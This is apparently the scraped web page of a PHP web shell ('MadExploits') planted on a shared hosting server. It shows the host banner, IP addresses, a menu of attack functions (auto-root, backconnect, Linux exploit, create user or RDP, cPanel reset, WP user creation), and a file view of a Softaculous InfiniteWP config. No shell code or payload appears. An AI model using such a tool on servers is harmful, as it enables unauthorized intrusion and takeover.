Linux premium155.web-hosting.com 4.18.0-513.11.1.lve.el8.x86_64 #1 SMP Thu Jan 18 16:21:02 UTC 2024 x86_64
LiteSpeed
: 162.0.235.200 | : 18.227.209.101
Cant Read [ /etc/named.conf ]
7.4.33
varifktc
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
softaculous /
iwp /
[ HOME SHELL ]
Name
Size
Permission
Action
images
[ DIR ]
drwxr-xr-x
php53
[ DIR ]
drwxr-xr-x
php56
[ DIR ]
drwxr-xr-x
php71
[ DIR ]
drwxr-xr-x
php81
[ DIR ]
drwxr-xr-x
php82
[ DIR ]
drwxr-xr-x
clone.php
4.76
KB
-rw-r--r--
config.php
1.09
KB
-rw-r--r--
edit.php
4.36
KB
-rw-r--r--
edit.xml
484
B
-rw-r--r--
fileindex.php
279
B
-rw-r--r--
import.php
3.21
KB
-rw-r--r--
info.xml
2.18
KB
-rw-r--r--
install.js
921
B
-rw-r--r--
install.php
4.71
KB
-rw-r--r--
install.xml
1.09
KB
-rw-r--r--
iwp.sql
18.85
KB
-rw-r--r--
iwp.zip
3.33
MB
-rw-r--r--
md5
2.08
KB
-rw-r--r--
notes.txt
734
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : config.php
<?php #Show Error define('APP_SHOW_ERROR', true); @ini_set('display_errors', (APP_SHOW_ERROR) ? 'On' : 'Off'); error_reporting(E_ALL & ~E_NOTICE & ~E_STRICT); if(defined('E_DEPRECATED')) { error_reporting(error_reporting() & ~E_DEPRECATED); } if(function_exists('phpversion')){ if(version_compare(phpversion(),'8.0.0','>=')){ error_reporting(error_reporting() & ~E_WARNING); define('IWP_PHP8',true); } } define('SHOW_SQL_ERROR', APP_SHOW_ERROR); define('APP_VERSION', '2.18.3'); define('APP_INSTALL_HASH', '[[APP_INSTALL_HASH]]'); define('APP_ROOT', dirname(__FILE__)); define('APP_DOMAIN_PATH', '[[softurl_no_http]]/'); define('APP_ROOT_V3', dirname(__FILE__).'/v3'); define('APP_DOMAIN_PATH_V3', '[[softurl_no_http]]/v3'); define('EXECUTE_FILE', 'execute.php'); define('DEFAULT_MAX_CLIENT_REQUEST_TIMEOUT', 180);//Request to client wp $config = array(); $config['SQL_DATABASE'] = '[[softdb]]'; $config['SQL_HOST'] = '[[softdbhost]]'; $config['SQL_USERNAME'] = '[[softdbuser]]'; $config['SQL_PASSWORD'] = '[[softdbpass]]'; $config['SQL_PORT'] = '3306'; $config['SQL_TABLE_NAME_PREFIX'] = '[[dbprefix]]';
Close